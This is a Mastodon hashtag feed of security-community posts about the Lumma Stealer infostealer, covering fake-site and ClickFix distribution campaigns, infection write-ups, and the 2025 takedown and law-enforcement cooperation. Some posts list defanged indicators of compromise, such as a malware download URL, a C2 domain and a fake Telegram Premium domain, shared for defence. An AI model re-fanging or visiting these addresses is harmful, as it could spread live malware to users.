ESET Research<p><a href="https://infosec.exchange/tags/ESETresearch" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESETresearch</span></a> joins Europol’s Cyber Intelligence Extension Programme (CIEP) 🤝 We are proud to announce ESET’s participation in the pilot phase of CIEP, a new initiative launched by Europol 's European Cybercrime Centre (EC3).<br>The program aims to strengthen public-private cooperation in the fight against cybercrime by enabling real-time collaboration and intelligence sharing. ESET Chief Research Officer Roman Kovac & Senior Malware Researcher Jakub Soucek, spent several days at Europol’s HQ.<br>ESET has already cooperated in EC3's Advisory Group, where we are represented by ESET Senior Research Fellow Righard Zwienenberg. ESET has also contributed to successful law enforcement operations: <a href="https://infosec.exchange/tags/Gamarue" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Gamarue</span></a>, <a href="https://infosec.exchange/tags/RedLine" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RedLine</span></a>, <a href="https://infosec.exchange/tags/Grandoreiro" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Grandoreiro</span></a>, <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://infosec.exchange/tags/Danabot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Danabot</span></a>.<br>The new CIEP initiative elevates this collaboration further, creating opportunities for direct, real-time engagement with Europol’s operational teams. Partnerships like this one are crucial in mitigating risks within today's rapidly evolving cyber threat landscape. <br>Cyber threats evolve rapidly, but through these partnerships, so does our collective defense. Together we can make Europe a safer place. 🤝</p>
fosstodon.org is one of the many independent Mastodon servers you can use to participate in the fediverse.
Fosstodon is an invite only Mastodon instance that is open to those who are interested in technology; particularly free & open source software.
If you wish to join, contact us for an invite.
Administered by:
Server stats:
8.6Kactive users
fosstodon.org: About · Status · Profiles directory · Privacy policy
Mastodon: About · Get the app · Keyboard shortcuts · View source code · v4.4.3
#LummaStealer
1 post · 1 participant · 0 posts today
OTX Bot<p>FAKE TELEGRAM PREMIUM SITE DISTRIBUTES NEW LUMMA STEALER VARIANT</p><p>A malicious campaign using the domain 'telegrampremium[.]app' is distributing a new variant of Lumma Stealer malware. The fake site mimics the official Telegram Premium platform and automatically downloads an executable file 'start.exe' upon access. This sophisticated information-stealing trojan can exfiltrate browser credentials, cryptocurrency wallet details, and system information. The malware employs various techniques for persistence, defense evasion, and data theft, including file system manipulation, registry modification, and clipboard operations. The campaign highlights the ongoing use of brand impersonation and social engineering for large-scale malware distribution, emphasizing the need for robust security measures and user awareness.</p><p>Pulse ID: 688ee51c244879cbcd8b5826<br>Pulse Link: <a href="https://otx.alienvault.com/pulse/688ee51c244879cbcd8b5826" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">otx.alienvault.com/pulse/688ee</span><span class="invisible">51c244879cbcd8b5826</span></a> <br>Pulse Author: AlienVault<br>Created: 2025-08-03 04:27:08</p><p>Be advised, this data is unverified and should be considered preliminary. Always do further verification.</p><p><a href="https://social.raytec.co/tags/Browser" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Browser</span></a> <a href="https://social.raytec.co/tags/Clipboard" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Clipboard</span></a> <a href="https://social.raytec.co/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> <a href="https://social.raytec.co/tags/DataTheft" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DataTheft</span></a> <a href="https://social.raytec.co/tags/ICS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ICS</span></a> <a href="https://social.raytec.co/tags/InfoSec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>InfoSec</span></a> <a href="https://social.raytec.co/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://social.raytec.co/tags/Malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Malware</span></a> <a href="https://social.raytec.co/tags/Mimic" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Mimic</span></a> <a href="https://social.raytec.co/tags/OTX" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OTX</span></a> <a href="https://social.raytec.co/tags/OpenThreatExchange" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OpenThreatExchange</span></a> <a href="https://social.raytec.co/tags/RAT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RAT</span></a> <a href="https://social.raytec.co/tags/SocialEngineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SocialEngineering</span></a> <a href="https://social.raytec.co/tags/Telegram" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Telegram</span></a> <a href="https://social.raytec.co/tags/Trojan" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Trojan</span></a> <a href="https://social.raytec.co/tags/bot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>bot</span></a> <a href="https://social.raytec.co/tags/cryptocurrency" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cryptocurrency</span></a> <a href="https://social.raytec.co/tags/AlienVault" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AlienVault</span></a></p>
abuse.ch :verified:<p>We've observed an interesting infection chain ⛓️ in the wild, starting with <a href="https://ioc.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> spread through a fake gaming website and resulting in <a href="https://ioc.exchange/tags/Latrodectus" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Latrodectus</span></a> and <a href="https://ioc.exchange/tags/SectopRat" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SectopRat</span></a> 🪲🔍👀</p><p>See below for more ⬇️</p>
The Threat Codex<p>Bulletproof Hosting Hunt - Connecting the dots from Lumma to Qwins Ltd (ASN 213702)<br><a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://infosec.exchange/tags/AS213702" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AS213702</span></a><br><a href="https://intelinsights.substack.com/p/bulletproof-hosting-hunt" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">intelinsights.substack.com/p/b</span><span class="invisible">ulletproof-hosting-hunt</span></a></p>
The Threat Codex<p>Back to Business: Lumma Stealer Returns with Stealthier Methods<br><a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <br><a href="https://www.trendmicro.com/en_us/research/25/g/lumma-stealer-returns.html" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">trendmicro.com/en_us/research/</span><span class="invisible">25/g/lumma-stealer-returns.html</span></a></p>
Pyrzout :vm:<p>Lumma Stealer Malware Returns After Takedown Attempt <a href="https://www.securityweek.com/lumma-stealer-malware-returns-after-takedown-attempt/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">securityweek.com/lumma-stealer</span><span class="invisible">-malware-returns-after-takedown-attempt/</span></a> <a href="https://social.skynetcloud.site/tags/Malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Malware</span></a>&Threats <a href="https://social.skynetcloud.site/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://social.skynetcloud.site/tags/takedown" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>takedown</span></a> <a href="https://social.skynetcloud.site/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a> <a href="https://social.skynetcloud.site/tags/Resurge" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Resurge</span></a> <a href="https://social.skynetcloud.site/tags/return" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>return</span></a></p>
Pyrzout :vm:<p>Lumma Stealer Malware Returns After Takedown Attempt <a href="https://www.securityweek.com/lumma-stealer-malware-returns-after-takedown-attempt/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">securityweek.com/lumma-stealer</span><span class="invisible">-malware-returns-after-takedown-attempt/</span></a> <a href="https://social.skynetcloud.site/tags/Malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Malware</span></a>&Threats <a href="https://social.skynetcloud.site/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://social.skynetcloud.site/tags/takedown" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>takedown</span></a> <a href="https://social.skynetcloud.site/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a> <a href="https://social.skynetcloud.site/tags/Resurge" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Resurge</span></a> <a href="https://social.skynetcloud.site/tags/return" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>return</span></a></p>
OTX Bot<p>Back to Business: Lumma Stealer Returns with Stealthier Methods</p><p>Lumma Stealer, an information-stealing malware, has resurfaced shortly after its takedown in May 2025. The cybercriminals behind it are now employing more covert tactics and expanding their reach. The malware is being distributed through discreet channels and uses stealthier evasion techniques. Lumma Stealer can steal sensitive data such as credentials and private files, and is marketed as a malware-as-a-service. Users are lured to download it through fake cracked software, deceptive websites, and social media posts. The malware's infrastructure has been diversified, with a shift towards using Russian-based cloud services. Recent campaigns include fake crack downloads, ClickFix campaigns using fake CAPTCHA pages, GitHub repository abuse, and social media promotions.</p><p>Pulse ID: 688096076e36d7d6fea700fa<br>Pulse Link: <a href="https://otx.alienvault.com/pulse/688096076e36d7d6fea700fa" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">otx.alienvault.com/pulse/68809</span><span class="invisible">6076e36d7d6fea700fa</span></a> <br>Pulse Author: AlienVault<br>Created: 2025-07-23 07:57:59</p><p>Be advised, this data is unverified and should be considered preliminary. Always do further verification.</p><p><a href="https://social.raytec.co/tags/CAPTCHA" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CAPTCHA</span></a> <a href="https://social.raytec.co/tags/Cloud" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Cloud</span></a> <a href="https://social.raytec.co/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> <a href="https://social.raytec.co/tags/GitHub" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>GitHub</span></a> <a href="https://social.raytec.co/tags/ICS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ICS</span></a> <a href="https://social.raytec.co/tags/InfoSec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>InfoSec</span></a> <a href="https://social.raytec.co/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://social.raytec.co/tags/Malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Malware</span></a> <a href="https://social.raytec.co/tags/MalwareAsAService" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAsAService</span></a> <a href="https://social.raytec.co/tags/OTX" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OTX</span></a> <a href="https://social.raytec.co/tags/OpenThreatExchange" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OpenThreatExchange</span></a> <a href="https://social.raytec.co/tags/Russia" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Russia</span></a> <a href="https://social.raytec.co/tags/SocialMedia" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SocialMedia</span></a> <a href="https://social.raytec.co/tags/bot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>bot</span></a> <a href="https://social.raytec.co/tags/AlienVault" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AlienVault</span></a></p>
ESET Research<p><a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ClickFix</span></a> went from virtually non-existent to the second most common attack vector blocked by <a href="https://infosec.exchange/tags/ESET" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESET</span></a>, surpassed only by <a href="https://infosec.exchange/tags/phishing" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>phishing</span></a>. This novel social engineering technique accounted for nearly 8% of all detections in H1 2025. <a href="https://infosec.exchange/tags/ESETresearch" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESETresearch</span></a><br>ClickFix lures users by displaying bogus error messages followed by quick fix instructions, including copy-pasting malicious code. Running the code in the victim’s command line interpreter delivers malware such as <a href="https://infosec.exchange/tags/RATs" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RATs</span></a>, infostealers, and cryptominers.<br>Between H2 2024 and H1 2025, ESET’s detection for ClickFix, HTML/FakeCaptcha, skyrocketed by 517%. Most detections in ESET telemetry were reported from Japan (23%), Peru (6%), and Poland, Spain, and Slovakia (>5% each).<br>What makes <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ClickFix</span></a> so effective? The fake error message looks convincing; instructions are simple, yet the copied command is too technical for most users to understand. Pasting it into cmd leads to compromise with final payloads, including <a href="https://infosec.exchange/tags/DarkGate" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DarkGate</span></a> or <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a>. <br>While <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ClickFix</span></a> was introduced by cybercriminals, it’s since been adopted by APT groups: Kimsuky, Lazarus; Callisto, Sednit; MuddyWater; APT36. NK-aligned actors used it to target developers, steal crypto and passwords from Metamask and <a href="https://infosec.exchange/tags/macOS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>macOS</span></a> Keychain. <br><a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ClickFix</span></a> uses psychological manipulation by presenting fake issues and offering quick solutions, which makes it dangerously efficient. It appears in many forms – error popups, email attachments, fake reCAPTCHAs – highlighting the need for greater vigilance online.<br>Read more in the <a href="https://infosec.exchange/tags/ESETThreatReport" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESETThreatReport</span></a>:<br>🔗 <a href="https://welivesecurity.com/en/eset-research/eset-threat-report-h1-2025" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">welivesecurity.com/en/eset-res</span><span class="invisible">earch/eset-threat-report-h1-2025</span></a></p>
Brad<p>2025-07-15 (Tuesday): <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> infection with <a href="https://infosec.exchange/tags/SecTopRAT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SecTopRAT</span></a>. </p><p>A <a href="https://infosec.exchange/tags/pcap" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>pcap</span></a> of the <a href="https://infosec.exchange/tags/Lumma" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Lumma</span></a> traffic and <a href="https://infosec.exchange/tags/SecTop" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SecTop</span></a> <a href="https://infosec.exchange/tags/RAT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RAT</span></a> activity, the <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a>/artifacts from an infection, and the associated IOCs are available at <a href="https://www.malware-traffic-analysis.net/2025/07/15/index.html" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">malware-traffic-analysis.net/2</span><span class="invisible">025/07/15/index.html</span></a></p>
ESET Research<p>In May 2025, <a href="https://infosec.exchange/tags/ESET" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESET</span></a> participated in operations that largely disrupted the infrastructure of two notorious infostealers: <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> and <a href="https://infosec.exchange/tags/Danabot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Danabot</span></a>. <br>As part of the Lumma Stealer disruption effort, carried out in conjunction with Microsoft, BitSight, Lumen, Cloudflare, CleanDNS, and GMO Registry, ESET supplied technical analysis and statistical information. <br>Danabot was targeted by the <a href="https://infosec.exchange/tags/FBI" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>FBI</span></a> and <a href="https://infosec.exchange/tags/DCIS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DCIS</span></a>, alongside <a href="https://infosec.exchange/tags/OperationEndgame" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OperationEndgame</span></a> led by <a href="https://infosec.exchange/tags/Europol" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Europol</span></a> and <a href="https://infosec.exchange/tags/Eurojust" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Eurojust</span></a>. ESET participated together with several other companies. We provided the analysis of the malware’s backend infrastructure and identified its C&C servers. <br>Before these takedowns, both infostealers were on the rise: in H1 2025, Lumma Stealer detections grew by 21%, while Danabot’s numbers increased by more than 50%.<br> For a time, Lumma Stealer was the primary payload of HTML/FakeCaptcha trojan, used in the <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ClickFix</span></a> social engineering attacks that we also cover in this issue of the <a href="https://infosec.exchange/tags/ESETThreatReport" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESETThreatReport</span></a>. In recent months, we have seen Danabot being delivered via ClickFix as well. <br>For more details on these two operations and on the ClickFix attacks, read the latest <a href="https://infosec.exchange/tags/ESETThreatReport" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESETThreatReport</span></a>: <a href="https://welivesecurity.com/en/eset-research/eset-threat-report-h1-2025" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">welivesecurity.com/en/eset-res</span><span class="invisible">earch/eset-threat-report-h1-2025</span></a></p>
Pyrzout :vm:<p>Hackers weaponize Shellter red teaming tool to spread infostealers – Source: securityaffairs.com <a href="https://ciso2ciso.com/hackers-weaponize-shellter-red-teaming-tool-to-spread-infostealers-source-securityaffairs-com/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">ciso2ciso.com/hackers-weaponiz</span><span class="invisible">e-shellter-red-teaming-tool-to-spread-infostealers-source-securityaffairs-com/</span></a> <a href="https://social.skynetcloud.site/tags/rssfeedpostgeneratorecho" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rssfeedpostgeneratorecho</span></a> <a href="https://social.skynetcloud.site/tags/informationsecuritynews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>informationsecuritynews</span></a> <a href="https://social.skynetcloud.site/tags/ITInformationSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ITInformationSecurity</span></a> <a href="https://social.skynetcloud.site/tags/SecurityAffairscom" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SecurityAffairscom</span></a> <a href="https://social.skynetcloud.site/tags/CyberSecurityNews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurityNews</span></a> <a href="https://social.skynetcloud.site/tags/PierluigiPaganini" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>PierluigiPaganini</span></a> <a href="https://social.skynetcloud.site/tags/SecurityAffairs" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SecurityAffairs</span></a> <a href="https://social.skynetcloud.site/tags/SecurityAffairs" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SecurityAffairs</span></a> <a href="https://social.skynetcloud.site/tags/BreakingNews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>BreakingNews</span></a> <a href="https://social.skynetcloud.site/tags/lummastealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>lummastealer</span></a> <a href="https://social.skynetcloud.site/tags/hackingnews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>hackingnews</span></a> <a href="https://social.skynetcloud.site/tags/Cybercrime" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Cybercrime</span></a> <a href="https://social.skynetcloud.site/tags/Security" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Security</span></a> <a href="https://social.skynetcloud.site/tags/SHELLTER" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SHELLTER</span></a> <a href="https://social.skynetcloud.site/tags/hacking" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>hacking</span></a> <a href="https://social.skynetcloud.site/tags/Malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Malware</span></a></p>
Brad<p>2025-07-02 (Wednesday): Another <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> infection with follow-up <a href="https://infosec.exchange/tags/Rsockstun" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Rsockstun</span></a> <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a>. </p><p>The <a href="https://infosec.exchange/tags/Lumma" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Lumma</span></a> Stealer infection uses a password-protected 7-zip archive, a NullSoft installer, and <a href="https://infosec.exchange/tags/AutoItv3" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AutoItv3</span></a>. </p><p>Malware samples, a <a href="https://infosec.exchange/tags/pcap" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>pcap</span></a> and some IOCs are available at <a href="https://www.malware-traffic-analysis.net/2025/07/02/index.html" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">malware-traffic-analysis.net/2</span><span class="invisible">025/07/02/index.html</span></a></p>
Brad<p>2025-06-27 (Friday): I ran another <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> infection today. It was basically the same as yesterday, except for the follow-up malware.</p><p>I saw the same URL for hxxp[:]//86.54.25[.]40/sok.exe, but it returned a different file.</p><p>It generated the same type of C2 traffic over TCP port 16443, but it used a different domain for the C2 server at eset-blacklist[.]net. </p><p>Sample:</p><p>- <a href="https://bazaar.abuse.ch/sample/9dc1872510d70d954662b42c0e3bedb80e719272554efc0051cb727241a6cacb/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">bazaar.abuse.ch/sample/9dc1872</span><span class="invisible">510d70d954662b42c0e3bedb80e719272554efc0051cb727241a6cacb/</span></a></p><p>Sandbox analysis:</p><p>- <a href="https://www.joesandbox.com/analysis/1724473" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="">joesandbox.com/analysis/1724473</span><span class="invisible"></span></a></p><p>- <a href="https://tria.ge/250627-26apgask14" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="">tria.ge/250627-26apgask14</span><span class="invisible"></span></a></p><p>- <a href="https://app.any.run/tasks/651d4998-807d-4ac2-821b-88061c288013" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">app.any.run/tasks/651d4998-807</span><span class="invisible">d-4ac2-821b-88061c288013</span></a></p>
Brad<p>2025-06-26 (Thursday): <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> infection leads to follow-up loader that retrieves a pen test tool hosted on Github and configures it as <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a>. </p><p>A <a href="https://infosec.exchange/tags/pcap" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>pcap</span></a> of the infection traffic, the associated malware, and IOCs are available at: <a href="https://www.malware-traffic-analysis.net/2025/06/26/index.html" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">malware-traffic-analysis.net/2</span><span class="invisible">025/06/26/index.html</span></a></p><p><a href="https://infosec.exchange/tags/Lumma" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Lumma</span></a></p>
The Threat Codex<p>Lumma meets LolzTeam<br><a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <br><a href="https://intelinsights.substack.com/p/lumma-meets-lolzteam" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">intelinsights.substack.com/p/l</span><span class="invisible">umma-meets-lolzteam</span></a></p>
Mateusz Chrobok<p>Zazwyczaj donoszę Wam (oczywiście uprzejmie) o wyciekach, kradzieżach, szpiegostwie i innych bezpiecznikowych katastrofach. Ale dziś? Mamy dwie gigantyczne wygrane w wojnie z cyberprzestępcami - i to z polskim akcentem! 🦫 </p><p>W nowym odcinku opowiadam o spektakularnym rozbiciu LummaStealera i ciosie wymierzonym w Danabota - dwóch złośliwych bestiach, które przez lata truły życie firmom i zwykłym użytkownikom na całym świecie. Jak działały? Jak je rozpracowano? Jakie miało to konsekwencje?</p><p>I co najważniejsze - jak w ogóle wygląda "fraud-as-a-service" od kuchni, łącznie z cenami, dokumentacją i obsługą klienta 24/7?</p><p>Odcinek przygotowany przy współpracy z ESET i DAGMA Bezpieczeństwo IT🦾 </p><p>Zapraszam 👇<br><a href="https://youtu.be/fcTdhBq4U88" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="">youtu.be/fcTdhBq4U88</span><span class="invisible"></span></a> </p><p><a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://infosec.exchange/tags/Danabot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Danabot</span></a> <a href="https://infosec.exchange/tags/ESET" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESET</span></a> <a href="https://infosec.exchange/tags/DagmaBezpiecze%C5%84stwoIT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DagmaBezpieczeństwoIT</span></a></p>
The Threat Codex<p>Group-IB contributes to INTERPOL’s Operation Secure, leading to the arrest of 32 suspects linked to information stealer malware in Asia<br><a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://infosec.exchange/tags/RisePro" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RisePro</span></a> <a href="https://infosec.exchange/tags/MetaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MetaStealer</span></a> <br><a href="https://www.group-ib.com/media-center/press-releases/interpol-infostealer-bust/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">group-ib.com/media-center/pres</span><span class="invisible">s-releases/interpol-infostealer-bust/</span></a></p>
Pyrzout :vm:<p>The strange tale of ischhfd83: When cybercriminals eat their own – Source: news.sophos.com <a href="https://ciso2ciso.com/the-strange-tale-of-ischhfd83-when-cybercriminals-eat-their-own-source-news-sophos-com/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">ciso2ciso.com/the-strange-tale</span><span class="invisible">-of-ischhfd83-when-cybercriminals-eat-their-own-source-news-sophos-com/</span></a> <a href="https://social.skynetcloud.site/tags/rssfeedpostgeneratorecho" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rssfeedpostgeneratorecho</span></a> <a href="https://social.skynetcloud.site/tags/CyberSecurityNews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurityNews</span></a> <a href="https://social.skynetcloud.site/tags/cybercrimeforums" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybercrimeforums</span></a> <a href="https://social.skynetcloud.site/tags/ThreatResearch" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ThreatResearch</span></a> <a href="https://social.skynetcloud.site/tags/nakedsecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>nakedsecurity</span></a> <a href="https://social.skynetcloud.site/tags/nakedsecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>nakedsecurity</span></a> <a href="https://social.skynetcloud.site/tags/lummastealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>lummastealer</span></a> <a href="https://social.skynetcloud.site/tags/SophosXOps" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SophosXOps</span></a> <a href="https://social.skynetcloud.site/tags/AsyncRAT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AsyncRAT</span></a> <a href="https://social.skynetcloud.site/tags/backdoor" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>backdoor</span></a> <a href="https://social.skynetcloud.site/tags/FEATURED" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>FEATURED</span></a> <a href="https://social.skynetcloud.site/tags/asyncrat" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>asyncrat</span></a> <a href="https://social.skynetcloud.site/tags/Backdoor" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Backdoor</span></a> <a href="https://social.skynetcloud.site/tags/featured" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>featured</span></a></p>
